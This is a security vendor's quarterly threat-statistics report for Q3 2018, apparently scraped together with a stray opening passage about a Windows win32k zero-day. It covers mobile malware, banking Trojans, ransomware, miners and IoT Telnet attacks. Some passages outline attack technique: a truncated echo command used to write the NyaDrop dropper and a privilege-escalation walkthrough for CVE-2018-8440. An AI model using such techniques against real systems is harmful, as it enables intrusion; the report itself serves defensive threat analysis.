Lack of proper message locking between win32k!xxxCalcValidRects and win32k!SfnINOUTNCCALCSIZE

The exploit populates lParam with pointers to the shellcode and after being successfully copyied to kernel inside win32k!SfnINOUTNCCALCSIZE, the kernel jumps to the user level. The exploit found in the wild only targeted 32-bit versions of Windows 7.

BSOD on an up-to-date version of Windows 7 with our proof of concept

As always, we provided Microsoft with a proof of concept for this vulnerability along with well-written source code.

IT threat evolution Q3 2018. Statistics

Mon, 11/12/2018 - 05:00

These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.

Q3 figures

According to Kaspersky Security Network:

  • Kaspersky Lab solutions blocked 947,027,517 attacks launched from online resources located in 203 countries.
  • 246,695,333 unique URLs were recognized as malicious by Web Anti-Virus components.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 305,315 users.
  • Ransomware attacks were registered on the computers of 259,867 unique users.
  • Our File Anti-Virus logged 239,177,356 unique malicious and potentially unwanted objects.
  • Kaspersky Lab products for mobile devices detected:
    • 1,305,015 malicious installation packages
    • 55,101 installation packages for mobile banking Trojans
    • 13,075 installation packages for mobile ransomware Trojans.
Mobile threats Q3 events

Perhaps the biggest news of the reporting period was the Trojan-Banker.AndroidOS.Asacub epidemic. It peaked in September when more than 250,000 unique users were attacked – and that only includes statistics for those with Kaspersky Lab’s mobile products installed on their devices.

Number of users attacked by the mobile banker Asacub in 2017 and 2018

The scale of the attack involving Asacub by far surpasses the largest attacks we have previously observed while monitoring mobile threats. The Trojan’s versions have sequential version numbers, suggesting the attacks were launched by just one threat actor. It’s impossible to count the total number of affected users, but it would need to be in the tens of thousands to make such a massive malicious campaign profitable.

Mobile threat statistics

In Q3 2018, Kaspersky Lab detected 1,305,015 malicious installation packages, which is 439,229 more packages than in the previous quarter.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of detected malicious installation packages, Q3 2017 – Q3 2018 (download)

Distribution of detected mobile apps by type

Among all the threats detected in Q3 2018, the lion’s share belonged to potentially unwanted RiskTool apps (52.05%); compared to the previous quarter, their share decreased by 3.3 percentage points (p.p.). Members of the RiskTool.AndroidOS.SMSreg family contributed most to this.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of newly detected mobile apps by type, Q2 – Q3 2018 (download)

Second place was occupied by Trojan-Dropper threats (22.57%), whose share increased by 9 p.p. Most files of this type belonged to the Trojan-Dropper.AndroidOS.Piom, Trojan-Dropper.AndroidOS.Wapnor and Trojan-Dropper.AndroidOS.Hqwar families.

The share of advertising apps continued to decrease and accounted for 6.44% of all detected threats (compared to 8.91% in Q2 2018).

The statistics show that the number of mobile financial threats has been rising throughout 2018, with the proportion of mobile banker Trojans increasing from 1.5% in Q1, to 4.38% of all detected threats in Q3.

TOP 20 mobile malware

Verdicts* %** 1 DangerousObject.Multi.Generic 55.85 2 Trojan.AndroidOS.Boogr.gsh 11.39 3 Trojan-Banker.AndroidOS.Asacub.a 5.28 4 Trojan-Banker.AndroidOS.Asacub.snt 5.10 5 Trojan.AndroidOS.Piom.toe 3.23 6 Trojan.AndroidOS.Dvmap.a 3.12 7 Trojan.AndroidOS.Triada.dl 3.09 8 Trojan-Dropper.AndroidOS.Tiny.d 2.88 9 Trojan-Dropper.AndroidOS.Lezok.p 2.78 10 Trojan.AndroidOS.Agent.rt 2,74 11 Trojan-Banker.AndroidOS.Asacub.ci 2.62 12 Trojan-Banker.AndroidOS.Asacub.cg 2.51 13 Trojan-Banker.AndroidOS.Asacub.ce 2.29 14 Trojan-Dropper.AndroidOS.Agent.ii 1,77 15 Trojan-Dropper.AndroidOS.Hqwar.bb 1.75 16 Trojan.AndroidOS.Agent.pac 1.61 17 Trojan-Dropper.AndroidOS.Hqwar.ba 1.59 18 Exploit.AndroidOS.Lotoor.be 1.55 19 Trojan.AndroidOS.Piom.uwp 1.48 20 Trojan.AndroidOS.Piom.udo 1.36

* This malware rating does not include potentially dangerous or unwanted programs such as RiskTool or adware.
** Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab’s mobile antivirus that were attacked.

First place in our TOP 20 once again went to DangerousObject.Multi.Generic (55.85%), the verdict we use for malware that’s detected using cloud technologies. Cloud technologies work when antivirus databases do not yet contain the data to detect a malicious program but the company’s cloud antivirus database already includes information about the object. This is basically how the very latest malicious programs are detected.

In second place was Trojan.AndroidOS.Boogr.gsh (11.39%). This verdict is given to files that our system recognizes as malicious based on machine learning..

Third and fourth places went to representatives of the Asacub mobile banker family – Trojan-Banker.AndroidOS.Asacub.a (5.28%) and Trojan-Banker.AndroidOS.Asacub.snt (5.10%).

Geography of mobile threats

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Map of attempted infections using mobile malware, Q3 2018 (download)

TOP 10 countries by share of users attacked by mobile malware:

Country* %** 1 Bangladesh 35.91 2 Nigeria 28.54 3 Iran 28.07 4 Tanzania 28.03 5 China 25.61 6 India 25.25 7 Pakistan 25.08 8 Indonesia 25.02 9 Philippines 23.07 10 Algeria 22.88

* Countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000) are excluded.
** Unique users attacked in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

In Q3 2018, Bangladesh (35.91%) retained first place in terms of the share of mobile users attacked. Nigeria (28.54%) came second. Third and fourth places were claimed by Iran (28.07%) and Tanzania (28.03%) respectively.

Mobile banking Trojans

During the reporting period, we detected 55,101 installation packages for mobile banking Trojans, which is nearly 6,000 fewer than in Q2 2018.

The largest contribution was made by Trojans belonging to the family Trojan-Banker.AndroidOS.Hqwar.jck – this verdict was given to 35% of all detected banking Trojans. Trojan-Banker.AndroidOS.Asacub came second, accounting for 29%.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q3 2017 – Q3 2018 (download)

Verdicts %* 1 Trojan-Banker.AndroidOS.Asacub.a 33.27 2 Trojan-Banker.AndroidOS.Asacub.snt 32.16 3 Trojan-Banker.AndroidOS.Asacub.ci 16.51 4 Trojan-Banker.AndroidOS.Asacub.cg 15.84 5 Trojan-Banker.AndroidOS.Asacub.ce 14.46 6 Trojan-Banker.AndroidOS.Asacub.cd 6.66 7 Trojan-Banker.AndroidOS.Svpeng.q 3.25 8 Trojan-Banker.AndroidOS.Asacub.cf 2.07 9 Trojan-Banker.AndroidOS.Asacub.bz 1.68 10 Trojan-Banker.AndroidOS.Asacub.bw 1.68

* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab’s mobile antivirus that were attacked by banking threats.

In Q3 2018, the TOP 10 rating of banking threats was almost exclusively (nine places out of 10) occupied by various versions of Trojan-Banker.AndroidOS.Asacub.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of mobile banking threats, Q3 2018 (download)

TOP 10 countries by share of users attacked by mobile banking Trojans:

Country* %** 1 Russia 2.18 2 South Africa 2.16 3 Malaysia 0.53 4 Ukraine 0.41 5 Australia 0.39 6 China 0.35 7 South Korea 0.33 8 Tajikistan 0.30 9 USA 0.27 10 Poland 0.25

* Countries where the number of users of Kaspersky Lab’s mobile antivirus is relatively small (under 10,000) are excluded.
** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

In Q3 2018, Russia ended up in first place in this TOP 10 because of the mass attacks involving the Asacub Trojan. The USA, the previous quarter’s leader, fell to ninth (0.27%) in Q3. Second and third place were occupied by South Africa (2.16%) and Malaysia (0.53%) respectively.

Mobile ransomware Trojans

In Q3 2018, we detected 13,075 installation packages for mobile ransomware Trojans, which is 1,044 fewer than in Q2.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q3 2017 – Q3 2018 (download)

Verdicts %* 1 Trojan-Ransom.AndroidOS.Svpeng.ag 47.79 2 Trojan-Ransom.AndroidOS.Svpeng.ah 26.55 3 Trojan-Ransom.AndroidOS.Zebt.a 6.71 4 Trojan-Ransom.AndroidOS.Fusob.h 6.23 5 Trojan-Ransom.AndroidOS.Rkor.g 5.50 6 Trojan-Ransom.AndroidOS.Svpeng.snt 3.38 7 Trojan-Ransom.AndroidOS.Svpeng.ab 2.15 8 Trojan-Ransom.AndroidOS.Egat.d 1.94 9 Trojan-Ransom.AndroidOS.Small.as 1.43 10 Trojan-Ransom.AndroidOS.Small.cj 1.23

* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab’s mobile antivirus attacked by ransomware Trojans.

In Q3 2018, the most widespread mobile ransomware Trojans belonged to the Svpeng family – Trojan-Ransom.AndroidOS.Svpeng.ag (47.79%) and Trojan-Ransom.AndroidOS.Svpeng.ah (26.55%). Together, they accounted for three quarters of all mobile ransomware Trojan attacks. The once-popular families Zebt and Fusob were a distant third and fourth, represented by Trojan-Ransom.AndroidOS.Zebt.a (6.71%) and Trojan-Ransom.AndroidOS.Fusob.h (6.23%) respectively.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of mobile ransomware Trojans, Q3 2018 (download)

TOP 10 countries by share of users attacked by mobile ransomware Trojans:

Country* %** 1 USA 1.73 2 Kazakhstan 0.36 3 China 0.14 4 Italy 0.12 5 Iran 0.11 6 Belgium 0.10 7 Switzerland 0.09 8 Poland 0.09 9 Mexico 0.09 10 Romania 0.08

* Countries where the number of users of Kaspersky Lab’s mobile antivirus is relatively small (under 10,000) are excluded.
** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

Just like in Q2, first place in the TOP 10 went to the United States (1.73%). Kazakhstan (0.6%) rose one place to second in Q3, while China (0.14%) rose from seventh to third.

Attacks on IoT devices

In this quarter’s report, we decided to only present the statistics for Telnet attacks, as this type of attack is used most frequently and employs the widest variety of malware types.

Telnet 99,4% SSH 0,6%

The popularity of attacked services according to the number of unique IP addresses from which attacks were launched, Q3 2018

Telnet attacks

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of IP addresses of devices from which attacks were attempted on Kaspersky Lab honeypots, Q3 2018 (download)

TOP 10 countries hosting devices that were sources of attacks targeting Kaspersky Lab honeypots.

Country %* 1 China 27.15% 2 Brazil 10.57% 3 Russia 7.87% 4 Egypt 7.43% 5 USA 4.47% 6 South Korea 3.57% 7 India 2.59% 8 Taiwan 2.17% 9 Turkey 1.82% 10 Italy 1.75%

* Infected devices in each country as a percentage of the global number of IoT devices that attack via Telnet.

In Q3, China (23.15%) became the leader in terms of the number of unique IP addresses directing attacks against Kaspersky Lab honeypots. Brazil (10.57%) came second, after leading the rating in Q2. Russia (7.87%) was third.

Successful Telnet attacks saw the threat actors download Downloader.Linux.NyaDrop.b (62.24%) most often. This piece of malware is remarkable in that it contains a shell code that downloads other malware from the same source computer that has just infected the victim IoT device. The shell code doesn’t require any utilities – it performs all the necessary actions within itself using system calls. In other words, NyaDrop is a kind of universal soldier, capable of performing its tasks irrespective of the environment it has been launched in.

It was the Trojans of the family Backdoor.Linux.Hajime that downloaded NyaDrop most frequently, because this is a very convenient self-propagation method for Hajime. The flow chart in this case is of particular interest:

  1. After successfully infecting a device, Hajime scans the network to find new victims.
  2. As soon as a suitable device is found, the lightweight NyaDrop (just 480 bytes) is downloaded to it.
  3. NyaDrop contacts the device that was the infection source and slowly downloads Hajime, which is much larger.

All these actions are only required because it’s quite a challenge to download files via Telnet, though it is possible to execute commands. For example, this is what creating a NyaDrop file looks like:

echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00

480 bytes can be sent this way, but sending 60 KB becomes problematic.

TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks

Verdicts %* 1 Trojan-Downloader.Linux.NyaDrop.b 62.24% 2 Backdoor.Linux.Mirai.ba 16.31% 3 Backdoor.Linux.Mirai.b 12.01% 4 Trojan-Downloader.Shell.Agent.p 1.53% 5 Backdoor.Linux.Mirai.c 1.33% 6 Backdoor.Linux.Gafgyt.ay 1.15% 7 Backdoor.Linux.Mirai.au 0.83% 8 Backdoor.Linux.Gafgyt.bj 0.61% 9 Trojan-Downloader.Linux.Mirai.d 0.51% 10 Backdoor.Linux.Mirai.bj 0.37%

* Proportion of downloads of each specific malicious program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks.

The rating did not differ much from the previous quarter: half the top 10 is occupied by different modifications of Mirai, which is the most widespread IoT malware program to date.

Financial threats Q3 events

The banking Trojan DanaBot that was detected in Q2 continued to develop rapidly in Q3. A new modification included not only an updated C&C/bot communication protocol but also an extended list of organizations targeted by the malware. Its prime targets in Q2 were located in Australia and Poland, but in Q3 organizations from Austria, Germany and Italy were also included.

To recap, DanaBot has a modular structure and is capable of loading extra modules to intercept traffic and steal passwords and crypto wallets. The Trojan spread via spam messages containing a malicious office document, which subsequently loaded the Trojan’s main body.

Financial threat statistics

In Q3 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 305,315 users.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by financial malware, Q3 2018 (download)

Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, we calculated the share of users of Kaspersky Lab products in each country that faced this threat during the reporting period out of all users of our products in that country.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of banking malware attacks, Q3 2018 (download)

TOP 10 countries by percentage of attacked users

Country* %** 1 Germany 3.0 2 South Korea 2.8 3 Greece 2.3 4 Malaysia 2.1 5 Serbia 2.0 6 United Arab Emirates 1.9 7 Portugal 1.9 8 Lithuania 1.9 9 Indonesia 1.8 10 Cambodia 1.8

* Countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000) are excluded.
** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in that country.

TOP 10 banking malware families

Name Verdicts %* 1 Zbot Trojan.Win32.Zbot 25.8 2 Nymaim Trojan.Win32.Nymaim 18.4 3 SpyEye Backdoor.Win32.SpyEye 18.1 4 RTM Trojan-Banker.Win32.RTM 9.2 5 Emotet Backdoor.Win32.Emotet 5.9 6 Neurevt Trojan.Win32.Neurevt 4.7 7 Tinba Trojan-Banker.Win32.Tinba 2.8 8 NeutrinoPOS Trojan-Banker.Win32.NeutrinoPOS 2.4 9 Gozi Trojan.Win32. Gozi 1.6 10 Trickster Trojan.Win32.Trickster 1.4

* Unique users attacked by the given malware as a percentage of all users that were attacked by banking threats.

In Q3 2018, there were three newcomers to this TOP 10: Trojan.Win32.Trickster (1.4%), Trojan-Banker.Win32.Tinba (2.8%) and Trojan-Banker.Win32.RTM (9.2%). The latter shot to fourth place thanks to a mass mailing campaign in mid-July that involved emails with malicious attachments and links.

Overall, the TOP 3 remained the same, though Trojan.Win32.Nymaim ceded some ground – from 27% in Q2 to 18.4% in Q3 – and fell to second.

Cryptoware programs Q3 events

In early July, Kaspersky Lab experts detected an unusual modification of the notorious Rakhni Trojan. What drew the analysts’ attention was that in some cases the downloader now delivers a miner instead of ransomware as was always the case with this malware family in the past.

August saw the detection of the rather unusual KeyPass ransomware. Its creators apparently decided to make provisions for all possible infection scenarios – via spam, with the help of exploit packs, and via manual brute-force attacks on the passwords of the remote access system, after which the Trojan is launched. The KeyPass Trojan can run in both hidden mode and GUI mode so the threat actor can configure encryption parameters.

Meanwhile, law enforcement agencies continue their systematic battle against ransomware. Following several years of investigations, two cybercriminals who distributed the CoinVault ransomware were found guilty in the Netherlands.

Statistics Number of new modifications

In Q3, the number of detected cryptoware modifications was significantly lower than in Q2 and close to that of Q1.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of new cryptoware modifications, Q4 2017 – Q3 2018 (download)

Number of users attacked by Trojan cryptors

In Q3 2018, Kaspersky Lab products protected 259,867 unique KSN users from Trojan cryptors. The total number of attacked users rose both against Q2 and on a month-on-month basis during Q3. In September, we observed a significant rise in the number of attempted infections, which appears to correlate with people returning from seasonal vacations.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by Trojan cryptors, Q3 2018 (download)

Geography of attacks

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of Trojan cryptors attacks, Q3 2018 (download)

TOP 10 countries attacked by Trojan cryptors

Country* %** 1 Bangladesh 5.80 2 Uzbekistan 3.77 3 Nepal 2.18 4 Pakistan 1.41 5 India 1.27 6 Indonesia 1.21 7 Vietnam 1.20 8 Mozambique 1.06 9 China 1.05 10 Kazakhstan 0.84

* Countries with relatively few Kaspersky Lab users (under 50,000) are excluded.
** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in that country.

Most of the places in this rating are occupied by Asian countries. Bangladesh tops the list with 5.8%, followed by Uzbekistan (3.77%) and the newcomer Nepal (2.18%) in third. Pakistan (1.41%) came fourth, while China (1.05%) fell from sixth to ninth and Vietnam (1.20%) fell four places to seventh.

TOP 10 most widespread cryptor families

Name Verdicts %* 1 WannaCry Trojan-Ransom.Win32.Wanna 28.72% 2 (generic verdict) Trojan-Ransom.Win32.Phny 13.70% 3 GandCrab Trojan-Ransom.Win32.GandCrypt 12.31% 4 Cryakl Trojan-Ransom.Win32.Cryakl 9.30% 5 (generic verdict) Trojan-Ransom.Win32.Gen 2.99% 6 (generic verdict) Trojan-Ransom.Win32.Cryptor 2.58% 7 PolyRansom/VirLock Virus.Win32.PolyRansom 2.33% 8 Shade Trojan-Ransom.Win32.Shade 1,99% 9 Crysis Trojan-Ransom.Win32.Crusis 1.70% 10 (generic verdict) Trojan-Ransom.Win32.Encoder 1.70%

* Unique Kaspersky Lab users attacked by a specific family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors.

The leading 10 places are increasingly occupied by generic verdicts, suggesting widespread cryptors are effectively detected by automatic intelligent systems. WannaCry (28.72%) still leads the way among specific cryptoware families. This quarter saw two new versions of the Trojan GandCrab (12.31%) emerge, meaning it remained in the most widespread ransomware rating. Among the old-timers that remained in the TOP 10 were PolyRansom, Cryakl, Shade, and Crysis, while Cerber and Purgen failed to gain much distribution this quarter.

Cryptominers

As we already reported in Ransomware and malicious cryptominers in 2016-2018, ransomware is gradually declining and being replaced with cryptocurrency miners. Therefore, this year we decided to start publishing quarterly reports on the status of this type of threat. At the same time, we began using a broader range of verdicts as a basis for collecting statistics on miners, so the statistics in this year’s quarterly reports may not be consistent with the data from our earlier publications.

Statistics Number of new modifications

In Q3 2018, Kaspersky Lab solutions detected 31,991 new modifications of miners.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of new miner modifications, Q3 2018 (download)

Number of users attacked by cryptominers

In Q3, Kaspersky Lab products detected mining programs on the computers of 1,787,994 KSN users around the world.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by cryptominers, Q3 2018 (download)

Cryptomining activity in September was comparable to that of June 2018, though we observed an overall downward trend in Q3.

Geography of attacks

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of cryptominers, Q3 2018 (download)

TOP 10 countries by percentage of attacked users

Country* %** 1 Afghanistan 16.85% 2 Uzbekistan 14.23% 3 Kazakhstan 10.17% 4 Belarus 9.73% 5 Vietnam 8.96% 6 Indonesia 8.80% 7 Mozambique 8.50% 8 Ukraine 7.60% 9 Tanzania 7.51% 10 Azerbaijan 7.13%

* Countries with relatively few Kaspersky Lab product users (under 50,000) are excluded.
** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country.

Vulnerable apps used by cybercriminals

The distribution of platforms most often targeted by exploits showed very little change from Q2. Microsoft Office applications (70%) are still the most frequently targeted – five times more than web browsers, the second most attacked platform.

Although quite some time has passed since security patches were released for the two vulnerabilities most often used in cyberattacks – CVE-2017-11882 and CVE-2018-0802 – the exploits targeting the Equation Editor component still remain the most popular for sending malicious spam messages.

An exploit targeting the vulnerability CVE-2018-8373 in the VBScript engine (which was patched in late August) was detected in the wild and affected Internet Explorer 9–11. However, we are currently observing only limited use of this vulnerability by cybercriminals. This is most probably due to Internet Explorer not being very popular, as well as the fact that VBScript execution is disabled by default in recent versions of Windows 10.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2018 (download)

Q3 was also marked by the emergence of two atypical 0-day vulnerabilities – CVE-2018-8414 and CVE-2018-8440. They are peculiar because information about the existence of these vulnerabilities, along with detailed descriptions and all the files required to reproduce them, was leaked to the public domain long before official patches were released for them.

In the case of CVE-2018-8414, an article was published back in June with a detailed description of how SettingContent-ms files can be used to execute arbitrary code in Windows. However, the security patch to fix this vulnerability was only released in Q3, one month after the article became publicly available and active exploitation of the vulnerability had already began. The researchers who described this technique reported it to Microsoft, but initially it was not recognized as a vulnerability requiring a patch. Microsoft reconsidered after cybercriminals began actively using these files to deliver malicious payloads, and a patch was released on July 14. According to KSN statistics, the SettingContent-ms files didn’t gain much popularity among cybercriminals, and after the security patch was released, their use ceased altogether.

Another interesting case was the CVE-2018-8440 security breach. Just like in the case above, all the information required for reproduction was deliberately published by a researcher, and threat actors naturally took advantage. CVE-2018-8440 is a privilege-escalation vulnerability, allowing an attacker to escalate their privilege in the system to the highest level – System. The vulnerability is based on how Windows processes a task scheduler advanced local procedure call (ALPC). The vulnerable ALPC procedure makes it possible to change the discretionary access control list (DACL) for files located in a directory that doesn’t require special privileges to access. To escalate privileges, the attacker exploits the vulnerability in the ALPC to change access rights to a system file, and then that system file is overwritten by an unprivileged user.

Attacks via web resources

The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are created by cybercriminals, while web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In the third quarter of 2018, Kaspersky Lab solutions blocked 947,027,517 attacks launched from web resources located in 203 countries around the world. 246,695,333 unique URLs were recognized as malicious by web antivirus components.

!function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of web attack sources by country, Q3 2018 (download)

In Q3, the USA (52.81%) was home to most sources of web attacks. Overall, the leading four sources of web attacks remained unchanged from Q2: the USA is followed by the Netherlands (16.26%), Germany (6.94%) and France (4.4%).

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered in each country during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malware-class malicious programs; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

